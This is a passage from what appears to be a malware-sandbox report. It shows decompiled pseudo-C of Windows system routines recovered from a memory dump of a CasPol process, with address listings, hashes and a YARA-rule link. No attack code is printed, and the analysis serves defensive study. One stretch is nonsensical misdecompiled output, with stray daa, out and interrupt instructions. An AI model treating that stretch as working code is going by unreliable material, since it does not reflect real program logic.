														goto L29;
													} else {
														__ax & 0x0000ffff = E013FF3E0(__edi,  *0x14a848c, __ax & 0x0000ffff);
														__eax =  *0x14a8488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E013FF3E0(_t324, _v80, _v64);
													_t266 = _v64;
													goto L26;
												case 2:
													 *0x14a8480 & 0x0000ffff = E013FF3E0(__edi,  *0x14a8484,  *0x14a8480 & 0x0000ffff);
													__eax =  *0x14a8480 & 0x0000ffff;
													__eax = ( *0x14a8480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E013FF3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E013FF3E0(_t324, _v76, _v36);
														_t266 = _v36;
													}
													L26:
													_t337 = _t337 + 0xc;
													_t324 = _t324 + (_t266 >> 1) * 2 + 2;
													__eflags = _t324;
													L27:
													_push(0x3b);
													_pop(_t268);
													 *((short*)(_t324 - 2)) = _t268;
													goto L28;
												case 6:
													__ebx =  *0x14a575c;
													__eflags = __ebx - 0x14a575c;
													if(__ebx != 0x14a575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E013FF3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x14a575c;
														} while (__ebx != 0x14a575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x14a8478 & 0x0000ffff = E013FF3E0(__edi,  *0x14a847c,  *0x14a8478 & 0x0000ffff);
													__eax =  *0x14a8478 & 0x0000ffff;
													__eax = ( *0x14a8478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E014439F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x14a6e58 & 0x0000ffff = E013FF3E0(__edi,  *0x14a6e5c,  *0x14a6e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x14a6e58 & 0x0000ffff;
													__eax = ( *0x14a6e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t291 = _v16;
													_t307 = _v32;
													L29:
													_t281 = _t281 + 4;
													__eflags = _t281;
													_v56 = _t281;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t291 = _t291 + 1;
									_v16 = _t291;
									__eflags = _t291 - _v48;
								} while (_t291 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t241 =  *(_v60 + _t322 * 4);
						if(_t241 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t241 * 4 +  &M013E2935))) {
							case 0:
								__ax =  *0x14a8488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t307 =  &_v64;
								_v80 = E013E2E3E(0,  &_v64);
								_t277 = _t277 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x14a8480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x14a8480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E013CEEF0(0x14a79a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E013CEB70(__ecx, 0x14a79a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t215 = _v72;
											__eflags = _t215;
											if(_t215 != 0) {
												L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t215);
											}
											_t216 = _v52;
											__eflags = _t216;
											if(_t216 != 0) {
												__eflags = _t330;
												if(_t330 < 0) {
													L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t216);
													_t216 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t287 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x14a7b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L013D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E013CEB70(__ecx, 0x14a79a0);
										__eax = _v52;
										L36:
										_pop(_t323);
										_pop(_t331);
										__eflags = _v8 ^ _t334;
										_pop(_t278);
										return E013FB640(_t216, _t278, _v8 ^ _t334, _t307, _t323, _t331);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t273 = _v56;
								if(_v56 != 0) {
									_t307 =  &_v36;
									_t275 = E013E2E3E(_t273,  &_v36);
									_t287 = _v36;
									_v76 = _t275;
								}
								if(_t287 == 0) {
									goto L44;
								} else {
									_t277 = _t277 + 2 + _t287;
								}
								goto L14;
							case 6:
								__eax =  *0x14a5764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x14a8478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x14a8478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x14a6e58 & 0x0000ffff;
								__eax = ( *0x14a6e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t322 = _t322 + 1;
								if(_t322 >= _v48) {
									goto L16;
								} else {
									_t307 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_t292 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					 *[ds:esi+0x28] =  *[ds:esi+0x28] + _t337;
					_t242 = _t241 + _t337;
					asm("daa");
					 *[ds:esi] =  *[ds:esi] + _t334;
					 *[ds:esi+0x28] =  *[ds:esi+0x28] + _t242;
					 *[ds:0x1f013e26] =  *[ds:0x1f013e26] + _t242;
					_pop(_t282);
					_t308 = _t307 + 1;
					 *((intOrPtr*)(_t242 +  &_a1530200378)) =  *((intOrPtr*)(_t242 +  &_a1530200378)) + _t308;
					 *((intOrPtr*)(_t308 + 1)) =  *((intOrPtr*)(_t308 + 1)) + _t242;
					 *_t329 =  *_t329 - _t324;
					 *((intOrPtr*)(_t242 - 0x9fec1d8)) =  *((intOrPtr*)(_t242 - 0x9fec1d8)) + _t242;
					asm("daa");
					 *[ds:esi] =  *[ds:esi] + _t282;
					 *_t329 =  *_t329 - _t282;
					 *((intOrPtr*)(_t329 + 0x28)) =  *((intOrPtr*)(_t329 + 0x28)) + _t292;
					 *[ds:ebp+0x27] =  *[ds:ebp+0x27] + _t282;
					_pop(_t283);
					 *((intOrPtr*)(_t242 + _t282 +  &_a1546912058)) =  *((intOrPtr*)(_t242 + _t282 +  &_a1546912058)) + _t329;
					_t339 = _t337 + _t292;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x148ff00);
					E0140D08C(_t283, _t324, _t329);
					_v44 =  *[fs:0x18];
					_t325 = 0;
					 *_a24 = 0;
					_t284 = _a12;
					__eflags = _t284;
					if(_t284 == 0) {
						_t246 = 0xc0000100;
					} else {
						_v8 = 0;
						_t332 = 0xc0000100;
						_v52 = 0xc0000100;
						_t248 = 4;
						while(1) {
							_v40 = _t248;
							__eflags = _t248;
							if(_t248 == 0) {
								break;
							}
							_t297 = _t248 * 0xc;
							_v48 = _t297;
							__eflags = _t284 -  *((intOrPtr*)(_t297 + 0x1391664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t263 = E013FE5C0(_a8,  *((intOrPtr*)(_t297 + 0x1391668)), _t284);
									_t339 = _t339 + 0xc;
									__eflags = _t263;
									if(__eflags == 0) {
										_t332 = E014351BE(_t284,  *((intOrPtr*)(_v48 + 0x139166c)), _a16, _t325, _t332, __eflags, _a20, _a24);
										_v52 = _t332;
										break;
									} else {
										_t248 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t248 = _t248 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t332;
						__eflags = _t332;
						if(_t332 < 0) {
							__eflags = _t332 - 0xc0000100;
							if(_t332 == 0xc0000100) {
								_t293 = _a4;
								__eflags = _t293;
								if(_t293 != 0) {
									_v36 = _t293;
									__eflags =  *_t293 - _t325;
									if( *_t293 == _t325) {
										_t332 = 0xc0000100;
										goto L76;
									} else {
										_t313 =  *((intOrPtr*)(_v44 + 0x30));
										_t250 =  *((intOrPtr*)(_t313 + 0x10));
										__eflags =  *((intOrPtr*)(_t250 + 0x48)) - _t293;
										if( *((intOrPtr*)(_t250 + 0x48)) == _t293) {
											__eflags =  *(_t313 + 0x1c);
											if( *(_t313 + 0x1c) == 0) {
												L106:
												_t332 = E013E2AE4( &_v36, _a8, _t284, _a16, _a20, _a24);
												_v32 = _t332;
												__eflags = _t332 - 0xc0000100;
												if(_t332 != 0xc0000100) {
													goto L69;
												} else {
													_t325 = 1;
													_t293 = _v36;
													goto L75;
												}
											} else {
												_t253 = E013C6600( *(_t313 + 0x1c));
												__eflags = _t253;
												if(_t253 != 0) {
													goto L106;
												} else {
													_t293 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t332 = E013E2C50(_t293, _a8, _t284, _a16, _a20, _a24, _t325);
											L76:
											_v32 = _t332;
											goto L69;
										}
									}
									goto L108;
								} else {
									E013CEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t332 = _a24;
									_t260 = E013E2AE4( &_v36, _a8, _t284, _a16, _a20, _t332);
									_v32 = _t260;
									__eflags = _t260 - 0xc0000100;
									if(_t260 == 0xc0000100) {
										_v32 = E013E2C50(_v36, _a8, _t284, _a16, _a20, _t332, 1);
									}
									_v8 = _t325;
									E013E2ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t246 = _t332;
					}
					L70:
					return E0140D0D1(_t246);
				}
				L108:
			}






















































                                                                        0x013e2584
                                                                        0x013e2586
                                                                        0x013e2590
                                                                        0x013e2596
                                                                        0x013e2597
                                                                        0x013e2598
                                                                        0x013e2599
                                                                        0x013e259e
                                                                        0x013e25a4
                                                                        0x013e25a9
                                                                        0x013e25ac
                                                                        0x013e25ae
                                                                        0x013e25b1
                                                                        0x013e25b2
                                                                        0x013e25b5
                                                                        0x013e25b8
                                                                        0x013e25bb
                                                                        0x013e25bc
                                                                        0x013e25bf
                                                                        0x013e25c2
                                                                        0x013e25c5
                                                                        0x013e25c6
                                                                        0x013e25cb
                                                                        0x013e25ce
                                                                        0x013e25d8
                                                                        0x013e25dd
                                                                        0x013e25de
                                                                        0x013e25e1
                                                                        0x013e25e3
                                                                        0x013e25e9
                                                                        0x013e26da
                                                                        0x013e26da
                                                                        0x013e26dd
                                                                        0x013e26e2
                                                                        0x01425b56
                                                                        0x00000000
                                                                        0x013e26e8
                                                                        0x013e26f9
                                                                        0x013e26fb
                                                                        0x013e26fe
                                                                        0x013e2700
                                                                        0x01425b60
                                                                        0x00000000
                                                                        0x013e2706
                                                                        0x013e2706
                                                                        0x013e270a
                                                                        0x013e270a
                                                                        0x013e270d
                                                                        0x013e2713
                                                                        0x013e2716
                                                                        0x013e2718
                                                                        0x013e271c
                                                                        0x013e271e
                                                                        0x01425b6c
                                                                        0x01425b6f
                                                                        0x01425b7f
                                                                        0x01425b89
                                                                        0x01425b8e
                                                                        0x01425b93
                                                                        0x01425b96
                                                                        0x01425b9c
                                                                        0x01425ba0
                                                                        0x01425ba3
                                                                        0x01425bab
                                                                        0x01425bb0
                                                                        0x01425bb3
                                                                        0x01425bb3
                                                                        0x01425ba3
                                                                        0x013e2724
                                                                        0x013e2726
                                                                        0x013e2729
                                                                        0x013e272c
                                                                        0x013e279d
                                                                        0x013e279d
                                                                        0x013e27a0
                                                                        0x013e27a2
                                                                        0x00000000
                                                                        0x013e272e
                                                                        0x013e272e
                                                                        0x013e2731
                                                                        0x013e2734
                                                                        0x013e2734
                                                                        0x013e2736
                                                                        0x01425bc1
                                                                        0x01425bc1
                                                                        0x01425bc4
                                                                        0x00000000
                                                                        0x01425bca
                                                                        0x01425bca
                                                                        0x01425bcd
                                                                        0x00000000
                                                                        0x01425bd3
                                                                        0x00000000
                                                                        0x01425bd3
                                                                        0x01425bcd
                                                                        0x013e273c
                                                                        0x013e273c
                                                                        0x013e2742
                                                                        0x013e2747
                                                                        0x013e274a
                                                                        0x013e274d
                                                                        0x013e2750
                                                                        0x00000000
                                                                        0x013e2756
                                                                        0x013e2756
                                                                        0x00000000
                                                                        0x013e2902
                                                                        0x013e2908
                                                                        0x013e290b
                                                                        0x00000000
                                                                        0x013e2911
                                                                        0x013e291c
                                                                        0x013e2921
                                                                        0x00000000
                                                                        0x013e2921
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013e2880
                                                                        0x013e2887
                                                                        0x013e288c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013e2805
                                                                        0x013e280a
                                                                        0x013e2814
                                                                        0x013e2816
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013e281e
                                                                        0x013e2821
                                                                        0x013e2823
                                                                        0x00000000
                                                                        0x013e2829
                                                                        0x013e2829
                                                                        0x013e2831
                                                                        0x013e283c
                                                                        0x013e283e
                                                                        0x00000000
                                                                        0x013e283e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013e284e
                                                                        0x013e2850
                                                                        0x013e2851
                                                                        0x013e2854
                                                                        0x013e2857
                                                                        0x013e285a
                                                                        0x013e285c
                                                                        0x013e285d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013e275d
                                                                        0x013e2761
                                                                        0x00000000
                                                                        0x013e2767
                                                                        0x013e276e
                                                                        0x013e2773
                                                                        0x013e2773
                                                                        0x013e2776
                                                                        0x013e2778
                                                                        0x013e277e
                                                                        0x013e277e
                                                                        0x013e2781
                                                                        0x013e2781
                                                                        0x013e2783
                                                                        0x013e2784
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01425bd8
                                                                        0x01425bde
                                                                        0x01425be4
                                                                        0x01425be6
                                                                        0x01425be8
                                                                        0x01425be9
                                                                        0x01425bee
                                                                        0x01425bf8
                                                                        0x01425bff
                                                                        0x01425c01
                                                                        0x01425c04
                                                                        0x01425c07
                                                                        0x01425c0b
                                                                        0x01425c0d
                                                                        0x01425c0d
                                                                        0x01425c15
                                                                        0x01425c18
                                                                        0x01425c1b
                                                                        0x01425c1b
                                                                        0x01425c1e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013e28c3
                                                                        0x013e28c8
                                                                        0x013e28d2
                                                                        0x013e28d4
                                                                        0x013e28d8
                                                                        0x013e28db
                                                                        0x01425c26
                                                                        0x01425c28
                                                                        0x01425c2d
                                                                        0x01425c2d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01425c34
                                                                        0x01425c36
                                                                        0x01425c49
                                                                        0x01425c4e
                                                                        0x01425c54
                                                                        0x01425c5b
                                                                        0x01425c5d
                                                                        0x01425c60
                                                                        0x013e2788
                                                                        0x013e2788
                                                                        0x013e278b
                                                                        0x013e278e
                                                                        0x013e278e
                                                                        0x013e278e
                                                                        0x013e2791
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013e2756
                                                                        0x013e2750
                                                                        0x00000000
                                                                        0x013e2794
                                                                        0x013e2794
                                                                        0x013e2795
                                                                        0x013e2798
                                                                        0x013e2798
                                                                        0x00000000
                                                                        0x013e2734
                                                                        0x013e272c
                                                                        0x013e2700
                                                                        0x013e25ef
                                                                        0x013e25ef
                                                                        0x013e25ef
                                                                        0x013e25f2
                                                                        0x013e25f8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013e25fe
                                                                        0x00000000
                                                                        0x013e28e6
                                                                        0x013e28ec
                                                                        0x013e28ef
                                                                        0x013e28f5
                                                                        0x013e28f8
                                                                        0x013e28f8
                                                                        0x00000000
                                                                        0x013e28f8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013e2866
                                                                        0x013e2866
                                                                        0x013e2876
                                                                        0x013e2879
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013e27e0
                                                                        0x013e27e7
                                                                        0x013e27e9
                                                                        0x013e27eb
                                                                        0x01425afd
                                                                        0x00000000
                                                                        0x01425afd
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013e2633
                                                                        0x013e2638
                                                                        0x013e263b
                                                                        0x013e263c
                                                                        0x013e263e
                                                                        0x013e2640
                                                                        0x013e2642
                                                                        0x013e2647
                                                                        0x013e2649
                                                                        0x013e264e
                                                                        0x013e2650
                                                                        0x013e2653
                                                                        0x013e2659
                                                                        0x013e26a2
                                                                        0x013e26a7
                                                                        0x013e26ac
                                                                        0x013e26b2
                                                                        0x01425b11
                                                                        0x01425b15
                                                                        0x01425b17
                                                                        0x00000000
                                                                        0x013e26b8
                                                                        0x013e26b8
                                                                        0x013e26ba
                                                                        0x013e27a6
                                                                        0x013e27a6
                                                                        0x013e27a9
                                                                        0x013e27ab
                                                                        0x013e27b9
                                                                        0x013e27b9
                                                                        0x013e27be
                                                                        0x013e27c1
                                                                        0x013e27c3
                                                                        0x013e27c5
                                                                        0x013e27c7
                                                                        0x01425c74
                                                                        0x01425c79
                                                                        0x01425c79
                                                                        0x013e27c7
                                                                        0x00000000
                                                                        0x013e26c0
                                                                        0x013e26c0
                                                                        0x013e26c3
                                                                        0x013e26c6
                                                                        0x013e26c6
                                                                        0x013e26c9
                                                                        0x013e26c9
                                                                        0x00000000
                                                                        0x013e26c9
                                                                        0x013e26ba
                                                                        0x013e265b
                                                                        0x013e265b
                                                                        0x013e265e
                                                                        0x013e2667
                                                                        0x013e266d
                                                                        0x013e2677
                                                                        0x013e267c
                                                                        0x013e267f
                                                                        0x013e2681
                                                                        0x01425b49
                                                                        0x01425b4e
                                                                        0x013e27cd
                                                                        0x013e27d0
                                                                        0x013e27d1
                                                                        0x013e27d2
                                                                        0x013e27d4
                                                                        0x013e27dd
                                                                        0x013e2687
                                                                        0x013e2687
                                                                        0x013e268a
                                                                        0x013e268b
                                                                        0x013e268e
                                                                        0x013e268f
                                                                        0x013e2691
                                                                        0x013e2696
                                                                        0x013e2698
                                                                        0x013e269d
                                                                        0x013e269f
                                                                        0x00000000
                                                                        0x013e269f
                                                                        0x013e2681
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013e2846
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013e2605
                                                                        0x013e260a
                                                                        0x013e260c
                                                                        0x013e2611
                                                                        0x013e2616
                                                                        0x013e2619
                                                                        0x013e2619
                                                                        0x013e261e
                                                                        0x00000000
                                                                        0x013e2624
                                                                        0x013e2627
                                                                        0x013e2627
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01425b1f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013e2894
                                                                        0x013e289b
                                                                        0x013e289d
                                                                        0x013e28a1
                                                                        0x01425b2b
                                                                        0x01425b2e
                                                                        0x01425b2e
                                                                        0x013e28a7
                                                                        0x013e28a9
                                                                        0x01425b04
                                                                        0x01425b09
                                                                        0x01425b09
                                                                        0x01425b09
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01425b35
                                                                        0x01425b3c
                                                                        0x013e28fb
                                                                        0x013e28fb
                                                                        0x013e26cc
                                                                        0x013e26cc
                                                                        0x013e26d0
                                                                        0x00000000
                                                                        0x013e26d2
                                                                        0x013e26d2
                                                                        0x00000000
                                                                        0x013e26d2
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013e25fe
                                                                        0x013e292d
                                                                        0x013e292f
                                                                        0x013e2930
                                                                        0x013e2935
                                                                        0x013e2937
                                                                        0x013e293b
                                                                        0x013e293e
                                                                        0x013e293f
                                                                        0x013e2942
                                                                        0x013e2947
                                                                        0x013e294e
                                                                        0x013e294f
                                                                        0x013e2950
                                                                        0x013e2958
                                                                        0x013e295a
                                                                        0x013e295c
                                                                        0x013e2962
                                                                        0x013e2963
                                                                        0x013e2966
                                                                        0x013e2968
                                                                        0x013e296b
                                                                        0x013e2972
                                                                        0x013e2974
                                                                        0x013e297c
                                                                        0x013e297e
                                                                        0x013e297f
                                                                        0x013e2980
                                                                        0x013e2981
                                                                        0x013e2982
                                                                        0x013e2983
                                                                        0x013e2984
                                                                        0x013e2985
                                                                        0x013e2986
                                                                        0x013e2987
                                                                        0x013e2988
                                                                        0x013e2989
                                                                        0x013e298a
                                                                        0x013e298b
                                                                        0x013e298c
                                                                        0x013e298d
                                                                        0x013e298e
                                                                        0x013e298f
                                                                        0x013e2990
                                                                        0x013e2992
                                                                        0x013e2997
                                                                        0x013e29a3
                                                                        0x013e29a6
                                                                        0x013e29ab
                                                                        0x013e29ad
                                                                        0x013e29b0
                                                                        0x013e29b2
                                                                        0x01425c80
                                                                        0x013e29b8
                                                                        0x013e29b8
                                                                        0x013e29bb
                                                                        0x013e29c0
                                                                        0x013e29c5
                                                                        0x013e29c6
                                                                        0x013e29c6
                                                                        0x013e29c9
                                                                        0x013e29cb
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013e29cd
                                                                        0x013e29d0
                                                                        0x013e29d9
                                                                        0x013e29db
                                                                        0x013e29dd
                                                                        0x013e2a7f
                                                                        0x013e2a84
                                                                        0x013e2a87
                                                                        0x013e2a89
                                                                        0x01425ca1
                                                                        0x01425ca3
                                                                        0x00000000
                                                                        0x013e2a8f
                                                                        0x013e2a8f
                                                                        0x00000000
                                                                        0x013e2a8f
                                                                        0x00000000
                                                                        0x013e29e3
                                                                        0x013e29e3
                                                                        0x013e29e3
                                                                        0x00000000
                                                                        0x013e29e3
                                                                        0x013e29dd
                                                                        0x00000000
                                                                        0x013e29db
                                                                        0x013e29e6
                                                                        0x013e29e9
                                                                        0x013e29eb
                                                                        0x013e29ed
                                                                        0x013e29f3
                                                                        0x013e29f5
                                                                        0x013e29f8
                                                                        0x013e29fa
                                                                        0x013e2a97
                                                                        0x013e2a9a
                                                                        0x013e2a9d
                                                                        0x013e2add
                                                                        0x00000000
                                                                        0x013e2a9f
                                                                        0x013e2aa2
                                                                        0x013e2aa5
                                                                        0x013e2aa8
                                                                        0x013e2aab
                                                                        0x01425cab
                                                                        0x01425caf
                                                                        0x01425cc5
                                                                        0x01425cda
                                                                        0x01425cdc
                                                                        0x01425cdf
                                                                        0x01425ce5
                                                                        0x00000000
                                                                        0x01425ceb
                                                                        0x01425ced
                                                                        0x01425cee
                                                                        0x00000000
                                                                        0x01425cee
                                                                        0x01425cb1
                                                                        0x01425cb4
                                                                        0x01425cb9
                                                                        0x01425cbb
                                                                        0x00000000
                                                                        0x01425cbd
                                                                        0x01425cbd
                                                                        0x00000000
                                                                        0x01425cbd
                                                                        0x01425cbb
                                                                        0x013e2ab1
                                                                        0x013e2ab1
                                                                        0x013e2ac4
                                                                        0x013e2ac6
                                                                        0x013e2ac6
                                                                        0x00000000
                                                                        0x013e2ac6
                                                                        0x013e2aab
                                                                        0x00000000
                                                                        0x013e2a00
                                                                        0x013e2a09
                                                                        0x013e2a0e
                                                                        0x013e2a21
                                                                        0x013e2a24
                                                                        0x013e2a35
                                                                        0x013e2a3a
                                                                        0x013e2a3d
                                                                        0x013e2a42
                                                                        0x013e2a59
                                                                        0x013e2a59
                                                                        0x013e2a5c
                                                                        0x013e2a5f
                                                                        0x013e2a5f
                                                                        0x013e29fa
                                                                        0x013e29f3
                                                                        0x013e2a64
                                                                        0x013e2a64
                                                                        0x013e2a6b
                                                                        0x013e2a6b
                                                                        0x013e2a6d
                                                                        0x013e2a72
                                                                        0x013e2a72
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: PATH
                                                                        • API String ID: 0-1036084923
                                                                        • Opcode ID: ceb6ae60a30a3bcc0254c290dfda585b0261919509ab269b2274c876631ba3b8
                                                                        • Instruction ID: b21eabfcbc5a51ea6039b2fdc0064159e14be0e71c4be94fe4ec97aa5c4ef530
                                                                        • Opcode Fuzzy Hash: ceb6ae60a30a3bcc0254c290dfda585b0261919509ab269b2274c876631ba3b8
                                                                        • Instruction Fuzzy Hash: 01C1B271D00329DBDB24DF99D885BAEBBF8FF48758F45402AE901AB390D774A941CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013EFAB0 Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 80%
                                                                        			E013EFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E013CEEF0(0x14a7b60);
					_t134 =  *0x14a7b84; // 0x77e17b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x14a7b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x14a7b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E013C6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
